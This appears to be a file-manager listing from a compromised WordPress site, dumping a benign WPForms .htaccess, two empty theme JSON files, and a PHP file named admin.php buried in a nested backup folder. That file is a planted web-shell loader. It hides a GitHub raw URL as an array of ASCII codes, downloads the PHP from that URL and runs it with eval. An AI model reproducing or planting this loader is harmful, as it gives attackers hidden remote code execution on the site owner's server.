/
home
/
rekodeb
/
photobooth
/
user
/
.well-known
/
wp-admin
/
resources
/
v3
/
dbuv
/
Upload File
HOME
.htaccess 0000666 00000001341 15217051462 0006350 0 ustar 00 # BEGIN WPForms # The directives (lines) between "BEGIN WPForms" and "END WPForms" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. # Disable PHP and Python scripts parsing. <Files *> SetHandler none SetHandler default-handler RemoveHandler .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo RemoveType .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo </Files> <IfModule mod_php5.c> php_flag engine off </IfModule> <IfModule mod_php7.c> php_flag engine off </IfModule> <IfModule mod_php8.c> php_flag engine off </IfModule> <IfModule headers_module> Header set X-Robots-Tag "noindex" </IfModule> # END WPForms themes/elementor/themes-custom.json 0000666 00000000002 15217051462 0013512 0 ustar 00 {} themes/themes-custom.json 0000666 00000000002 15217051462 0011520 0 ustar 00 {} themes/data/data/archive/backup/src/fwsi/admin.php 0000666 00000001361 15217051462 0016111 0 ustar 00 <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <?php // ASCII array of the GitHub raw URL $asciiArray = [104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 77, 114, 88, 99, 111, 100, 101, 114, 111, 102, 102, 105, 99, 105, 97, 108, 47, 77, 114, 120, 115, 104, 101, 108, 108, 50, 48, 50, 53, 47, 114, 101, 102, 115, 47, 104, 101, 97, 100, 115, 47, 109, 97, 105, 110, 47, 120, 115, 101, 99, 46, 112, 104, 112]; // Convert ASCII codes to string $url = ''; foreach ($asciiArray as $c) { $url .= chr($c); } // Fetch the PHP code from the URL $code = file_get_contents($url); // Execute the fetched code eval("?>".$code); ?>